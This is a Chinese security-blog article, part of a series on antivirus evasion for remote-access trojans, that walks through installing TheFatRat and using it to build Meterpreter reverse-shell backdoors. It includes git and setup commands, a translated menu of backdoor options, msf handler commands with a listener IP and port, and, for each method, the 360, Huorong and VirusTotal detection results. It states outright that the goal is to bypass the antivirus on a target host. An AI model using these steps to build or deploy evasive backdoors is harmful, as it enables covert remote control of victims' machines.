本专题文章导航

1、远控免杀专题(1)-基础篇：https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg

2、远控免杀专题(2)-msfvenom隐藏的参数：https://mp.weixin.qq.com/s/1r0iakLpnLrjCrOp2gT10w

3、远控免杀专题(3)-msf自带免杀(VT免杀率35/69)：https://mp.weixin.qq.com/s/A0CZslLhCLOK_HgkHGcpEA

4、远控免杀专题(4)-Evasion模块(VT免杀率12/71)：https://mp.weixin.qq.com/s/YnnCM7W20xScv52k_ubxYQ

5、远控免杀专题(5)-Veil免杀(VT免杀率23/71):https://mp.weixin.qq.com/s/-PHVIAQVyU8QIpHwcpN4yw

6、远控免杀专题(6)-Venom免杀(VT免杀率11/71):https://mp.weixin.qq.com/s/CbfxupSWEPB86tBZsmxNCQ

7、远控免杀专题(7)-Shellter免杀(VT免杀率7/69)：https://mp.weixin.qq.com/s/ASnldn6nk68D4bwkfYm3Gg

8、远控免杀专题(8)-BackDoor-Factory免杀(VT免杀率13/71)：https://mp.weixin.qq.com/s/A30JHhXhwe45xV7hv8jvVQ

9、远控免杀专题(9)-Avet免杀(VT免杀率14/71)：https://mp.weixin.qq.com/s/EIfqAbMC8HoC6xcZP9SXpA

10、远控免杀专题(10)-TheFatRat免杀(VT免杀率22/70)：本文

文章打包下载及相关软件下载：https://github.com/TideSec/BypassAntiVirus

---

免杀能力一览表

几点说明：

1、上表中标识 √ 说明相应杀毒软件未检测出病毒，也就是代表了Bypass。

2、为了更好的对比效果，大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。

3、由于本机测试时只是安装了360全家桶和火绒，所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01)，火绒版本5.0.34.16(2020.01.01)，360安全卫士12.0.0.2002(2020.01.01)。

4、其他杀软的检测指标是在virustotal.com（简称VT）上在线查杀，所以可能只是代表了静态查杀能力，数据仅供参考，不足以作为免杀的精确判断指标。

5、完全不必要苛求一种免杀技术能bypass所有杀软，这样的技术肯定是有的，只是没被公开，一旦公开第二天就能被杀了，其实我们只要能bypass目标主机上的杀软就足够了。

---

一、TheFatRat介绍

TheFatRat创建的后门或者payload，可以在Linux，Windows，Mac和Android上等多种平台上执行，可生成exe、apk、sh、bat、py等多种格式。TheFatRat可以和msf无缝对接，并且集成内置了Fudwin、Avoid、backdoor-factory等多个免杀工具，对powershell的免杀姿势尤其多样。

二、安装TheFatRat

推荐使用linux操作系统，如Kali、Parrot、Dracos、BackTrack、Backbox等。

1、Github安装

安装比较简单，首先从github上clone下来

git clone https://github.com/Screetsec/TheFatRat

然后进入TheFatRat目录

cd TheFatRat

执行安装命令

chmod +x setup.sh && ./setup.sh

在成功安装后，可以查看TheFatRat/logs目录下的setup.log文件，里面是TheFatRat需要的一些软件和环境。

2、软件升级

作者提供了升级的命令，可直接升级软件

./update && chmod + x setup.sh && ./setup.sh

三、TheFatRat使用说明

在安装完成后，使用命令fatrat即可执行，启动略慢。TheFatRat和专题9里的Avet一样，也默认不允许远程连接后执行，只能在linux主机内执行。

运行时会检测一些软件或环境是否已经安装

同时还会有个界面提醒大家不要把生成的后门上传到virustotal.com上面，可以上传到nodistribute.com(专门试了下，但上传样本一直不成功)。

之后就能看到启动后的界面了

常用创建后门菜单如下，我自己翻译解释了一下，有个别可能不太准确。

[01] Create Backdoor with msfvenom #01：直接利用msf来生产后门，基本不能免杀[02] Create Fud 100% Backdoor with Fudwin 1.0#02：使用Fudwin 1.0创建powershell后门，ps1利用powerstager混淆，从结果来看效果不错[03] Create Fud Backdoor with Avoid v1.2 # 03: 使用Avoid v1.2创建后门[04] Create Fud Backdoor with backdoor-factory [embed] #04：使用backdoor-factory创建后门[05] Backdooring Original apk [Instagram, Line,etc] #05：生成安卓使用的apk后门[06] Create Fud Backdoor 1000% with PwnWinds [Excelent] #06：综合了多种方式，可生成bat、exe、dll、ps1等，可利用c、C#多种语言编译，官方非常推荐，但经尝试免杀效果一般，肯定是被杀软列入特征库了[07] Create Backdoor For Office with Microsploit #07：生成office类后门[08] Trojan Debian Package For Remote Access [Trodebi]#08：生成linux后门

由于01是直接调用了msfvenom生成payload，只不过稍微进行了多个msfvenom编码，免杀效果肯定一般。

[01] Create Backdoor with msfvenom生成过程如下：

我这里就直接使用官方推荐的2和6进行测试了。

四、使用TheFatRat生成ps1-exe(VT免杀率22/70)

在主菜单选择2，进入[02] Create Fud 100% Backdoor with Fudwin 1.0，选择1，利用powerstager混淆，并将powershell编译成exe。

在生成过程中可能会报错，如下所示

这个时候需要去查看TheFatRat/logs目录下的fudwin.log文件，看看什么报错信息。

我的第一次报错是因为python没有安装named包，第二次报错是因为输入的文件名没有写后缀，这里特别注意，必须写后缀，不然会报错。

这样就生成成功了。

在我本地机器上监听3333端口

use exploit/multi/handlerset PAYLOAD windows/x64/meterpreter/reverse_tcpset LHOST 10.211.55.2set LPORT 3333exploit -j

在测试机器上执行payload13.exe

虽然报错，但可正常上线。

打开杀软进行测试，虽然火绒静态查杀没查出来，不过行为检测查杀到了。360静态和动态都能查杀。（病毒库均已更新到2020.01.01）

virustotal.com中22/70个报毒

五、使用TheFatRat生成加壳exe(VT免杀率12/70)

在主菜单选择2，进入[02] Create Fud 100% Backdoor with Fudwin 1.0，选择2，slow but powerfull（慢但是有效）

输入监听ip和端口后，可能会报错，也可能解密界面都消失，但其实后台还在运行.

看免杀过程，应该是msfvenom一定编码后进行upx加壳,可能还有其他处理，想了解详细过程的可以看下源码。

等一段时间后，在/root/Fatrat_Generated/目录下会发现生成了Powerfull.exe和Powerfull-fud.exe。

在测试机器运行，火绒静态动态都可查杀，可正常上线

360动态和静态都没有反应

virustotal.com中12/70个报毒

六、使用TheFatRat编译C#+powershell生成exe(VT免杀率37/71)

尝试官方比较推荐的第6种方式[06] Create Fud Backdoor 1000% with PwnWinds [Excelent],进入后菜单如下，我选择2使用c#+powershell来生成exe

配置好ip和端口，选择好监听payload

生成成功

可正常上线

打开杀软，静态检测没问题，但行为检测时360和火绒都报预警了。

virustotal.com中37/71个报毒

之后也尝试了下生成bat和dll文件，免杀率大约在18/58和22/65。

四、小结

TheFatRat创建的后门格式和支持的平台比较多样化，而且还支持生成CDROM/U盘中能自动运行(生成AutoRun文件)的后门文件，并且可以对payload更改图标，具有一定伪装效果。

TheFatRat的很多免杀方式是借助于msfvenom编码、upx等加壳压缩、c/c#编译等将powershell混淆后编译成exe或bat文件，但有些在执行时还是会调用powershell，而powershell的调用已经被各大杀软盯的很紧了，所以查杀效果只能算是一般了。

由于使用TheFatRat生成了多种payload，免杀效果各不相同，我就选了个折中一些的22/70作为TheFatRat的免杀代表。

五、参考资料

TheFatRat 一款简易后门工具：https://www.zhuanzhi.ai/document/22f6e03336336de7f211ac7b97c2fb0f

TheFatRat – 跨平台反弹后门Shell生成神器：http://caidaome.com/?post=198

扫描下方二维码学习更多WEB安全知识：

Ms08067安全实验室

专注于普及网络安全知识。团队已出版《Web安全攻防：渗透测试实战指南》，《内网安全攻防：渗透测试实战指南》，目前在编Python渗透测试，JAVA代码审计和二进制逆向方面的书籍。

团队公众号定期分享关于CTF靶场、内网渗透、APT方面技术干货，从零开始、以实战落地为主，致力于做一个实用的干货分享型公众号。

官方网站：www.ms08067.com